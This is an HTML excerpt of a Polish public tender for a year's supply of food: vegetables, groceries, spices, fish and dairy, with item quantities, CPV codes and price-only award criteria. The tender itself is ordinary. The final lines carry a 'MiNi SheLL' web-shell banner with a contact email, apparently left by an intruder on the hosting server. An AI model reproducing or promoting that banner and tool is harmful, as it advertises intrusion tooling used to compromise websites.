<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.20.00-6, 15.13.11.30-5, 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kapusta biała główka	kg	400	
2	Kapusta biała główka	szt	300	
3	Kapusta czerwona główka	kg	300	
4	Kapusta pekińska	kg	400	
5	Kapusta włoska	szt	100	
6	Kapusta kiszona	kg	900	
7	Ziemniaki	kg	32200	
8	Pietruszka świeża	kg	200	
9	Marchew świeża	kg	3000	
10	Buraki czerwone	kg	1300	
11	Cebula żółta	kg	600	
12	Pieczarki świeże	kg	400	
13	Seler świeży	kg	400	
14	Jabłka	kg	500	
15	Ogórki kiszone	kg	500	
16	Fasola biała	kg	100	
17	Sałata zielona	szt	600	
18	Sałata lodowa	szt	400	
19	Botwinka	szt	100	
20	Ogórki zielone świeże	kg	500	
21	Koper	szt	350	
22	Natka pietruszki	szt	350	
23	Pory	szt	150	
24	Rzodkiewka	szt	200	
25	Czosnek	szt	100	
26	Pomidory	kg	600	
27	Papryka świeża	kg	100	
28	Szczypiorek	szt	250	
29	Groch łupany	kg	100	
30	Banany op.16kg	op	18	
31	Truskawki swieze	kg	60	
32	Owoce sezonowe  arbuz/gruszki/śliwki	kg	50	
33	Brzoskwinie/nektarynki  (sezonowo)	kg	50	
34	Seler konserwowy	szt	80	0,29 kg
35	Fasola konserwowa czerwona	szt	80	0,38kg
36	Kukurydza konserwowa	szt	50	0,4kg
37	Groszek konserwowy	szt	80	0,4kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ciastka biszkopty	op	80	40g
2	Jaja	szt	26000	L
3	Budyń (różne smaki)	szt	200	40g
4	Mąka pszenna	kg	1000	1kg
5	Kasza manna	kg	300	1kg
6	Ryż	kg	450	1kg
7	Cukier	kg	2300	1kg
8	Makaron łazanka	kg	150	500g
9	Makaron świderki	kg	300	1kg
10	Makaron wstążka	kg	300	1kg
11	Makaron krajanka	kg	300	1kg
12	Sól drobna jodowana	kg	900	1kg
13	Płatki owsisane	szt	300	500g
14	Płatki jęczmienne błyskawiczne	szt	300	500g
15	Płatki ryżowe	szt	450	400g
16	Herbata granulowana typu saga 	szt	1100	100g
17	Herbata granulowan typu lipton	szt	200	100g
18	Kawa typu inka	szt	200	150g
19	Mąka ziemniaczana	kg	100	1kg
20	Chrzan konserwowy	szt	100	350g
21	Chrupki kukurydziane	szt	400	50g
22	Koncentrat pomidorowy 30%	szt	700	200g
23	Olej uniwersalny	l	400	1 l
24	Kisiel różne smaki	szt	200	40g
25	Szczaw konserwowy	szt	100	330g
26	Galaretka owocowa różne smaki	szt	200	80g
27	Kasza jęczmienna	kg	350	1kg
28	Dżemy różne smaki	szt	600	270g
29	Herbatniki paczkowane	szt	100	100g
30	Cukier waniliowy	szt	100	32g
31	Ketchup	szt	50	480g
32	Musztarda	szt	100	210g
33	Majonez	szt	350	400g
34	Syrop owocowy 5l	l	50	5l
35	Ciastka kruche (różne rodzaje)	kg	100	2kg
36	Cukierki  czekoladowe  	kg	5	2kg
37	Batoniki (różne smaki)	szt	100	50g
38	Wafelki (op.2 kg)	kg	50	2kg
39	Misie typu lubisie	szt	400	30g
40	Ocet winny	szt	10	0,25l
41	Koncentra barszcz czerwony w płynie	szt	50	0,25l
42	Kwasek cytrynowy	szt	100	50g
43	Kasza gryczana	kg	100	1kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rosołek drobiowy (typu winiary, prymat lub inne podobne)	szt	6	20kg
2	Przyprawa szefa kuchni (typu kucharek,wegeta)	szt	12	5kg
3	Sosy do mięs (typu myśliwski , grzybowy pieczeniowy)	szt	12	1kg
4	Przyprawa w płynie typu magii	l	30	1kg
5	Sosy do sałatek typu  koperkowy,  ogrodowy	szt	15	0,80kg
6	Rosołek wołowy	szt	5	0,80kg
7	Rosołek o smaku wędzonki	szt	5	0,80kg
8	Przyprawa do mięs ( typu delikat)	szt	10	060kg
9	Przyprawa do drobiu	szt	10	0,60kg
10	Przyprawa do ryb	szt	6	0,60kg
11	Zupa żurek	szt	5	3kg
12	Tymianek	szt	30	10g
13	Pieprz naturalny mielony	szt	15	0,5
14	Papryka mielona	szt	3	0,50kg
15	Ziele angielskie	szt	10	0,50kg
16	Majeranek	szt	10	0,25kg
17	Marynata do wieprzowiny na bazie soli morskiej	szt	14	0,75kg
18	Przyprawa do bigosu	szt	100	20g
19	Zioła w oleju typu zioła włoskie	szt	10	0,34kg
20	Oregano	szt	30	10g
21	Liście laurowe	szt	300	8g
22	Barszczyk czerwony	szt	3	3kg
23	Zupa Brokułowa	szt	8	1kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.12.00-6, 15.89.15.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ryby mrożone i wędzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Tilapia	kg	100	5kg
2	Miruna	kg	900	7kg
3	Makrela wędzona	kg	120	5kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3, 15.23.40.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Tłuszcze roślinne, sery i przetwory mleczne oraz odżywki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko typu Bebiko 	szt	150	0,35kg
2	Margaryna	kg	100	0,25kg
3	Ser topiony bloczki 100g	szt	1000	0,1kg
4	Ser kanapkowy 	szt	380	0,15kg
5	Ser żółty	kg	200	luz
6	Serki owocowe typu (danio, danonki,bakusie) 150g	szt	1100	150g
7	Jogurty owocowe typu (bakoma, danon, zott)150g	szt	1100	150g
8	Krem czekoladowy typu nutella	szt	30	0,75kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.22.00-1, 15.43.11.00-9, 15.54.10.00-2, 15.54.40.00-3, 15.55.13.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com